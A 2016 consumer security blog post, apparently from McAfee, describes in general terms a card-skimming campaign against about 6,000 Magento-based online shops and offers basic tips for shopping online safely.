Leading E-Commerce Platform Magento Cracked by Cybercriminals

By on Oct 20, 2016

There’s a modern joy we’re all too familiar with. We’ve all made an online purchase while reclining in pajamas, computer on our lap. Everyone knows the comfort of simply punching credit card numbers into a website for a new item. That’s what we do for Converse shoes, Audi accessories, and even donations to political parties. But one dark element turns convenience into fear. Such transactions also attract the buzz of cybercriminals. Just recently, roughly 6,000 online shops — including those mentioned above, as well as the National Republican Senatorial Committee — have had user payment details stolen.

Such a large attack isn’t easy to pull off. To do so, perpetrators targeted something many e-commerce websites have in common: Magento. Don’t worry if you haven’t heard that name before. Simply put, Magento is a service that supports many e-commerce stores. Think of it this way: fashion designers or politicians may be experts in clothing trends or policy-making, but they’re not familiar with technical aspects of online selling. By using Magento, they can build websites, manage orders, and analyze business data.

Now, here’s what’s crucial. Magento also processes payments for, and runs on, around 250,000 websites. That’s exactly what cybercriminals are after: a chance for looting at such scale!

Cyber crooks, over the past six months, have been siphoning credit cards from websites that use Magento. And these aren’t your run-of-the-mill attacks. Rather than going after a company’s database, they’ve used malicious code to forward card details during the actual transactions made on Magento-hosted systems. Once you submit those digits, an illicit underground market obtains them. Disguising their efforts further, perpetrators even used stenography to hide data within image files, so security teams wouldn’t notice. All in all, these sophisticated actions made a recipe for many stolen cards.

To put this into perspective, big names such as Audi, Converse, and the National Republican Senatorial Committee were all among the 6,000 affected websites. To be clear, the victims either used an out-of-date version of Magento or lacked in prevention efforts, which made them vulnerable to hacking. But this attack still highlights the risks of buying things online from insecure platforms. With global e-commerce accounting for $1.915 trillion this year, and projected to reach $4 trillion by 2020, we’re not likely to see the end of such attacks anytime soon.

And let’s be honest. Nobody is likely to head to a brick-and-mortar shop for every single purchase, in this digital day and age. Unless we get thrown into a time machine, the comfort and convenience of clicking away in our pajamas is simply too irresistible. So it’s not a matter of avoiding online shopping, but doing so safely.

The good news? That’s possible. Here’s are a couple tips to keep in mind for your next online purchase:

  • Check for a secure website. Do you see “https” instead of ”http” in the web address? Every Web user should know that “s” stands for secure. Don’t enter any information on insecure webpages. This measure can’t guarantee 100% protection from advanced tactics such those used in the Magento breach, but checking for “https” is the absolute first thing you should do to understand if a site is legitimate.
  • Make sure your credit card has fraud protection. When cybercriminals steal your card’s digits, you shouldn’t have to pay for their lunch. When shopping online, make sure to use a card that won’t leave you with the bill if fraud occurs. As a best practice, also be sure to check your statements regularly, and flag any suspicious activity on your card to your bank.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee on Twitter, and ‘Like’ us on Facebook.

gary

About the Author

Gary Davis

Gary Davis was previously McAfee's Consumer Security Evangelist providing security education and advice to businesses and consumers. He is a sought-after speaker on trends in digital security, appearing at conferences and events, as well as security and consumer lifestyle broadcast outlets and publications such as ABC, NBC, FOX, the Wall Street Journal, USA Today, Money ...

Read more posts from Gary Davis

Subscribe to McAfee Securing Tomorrow Blogs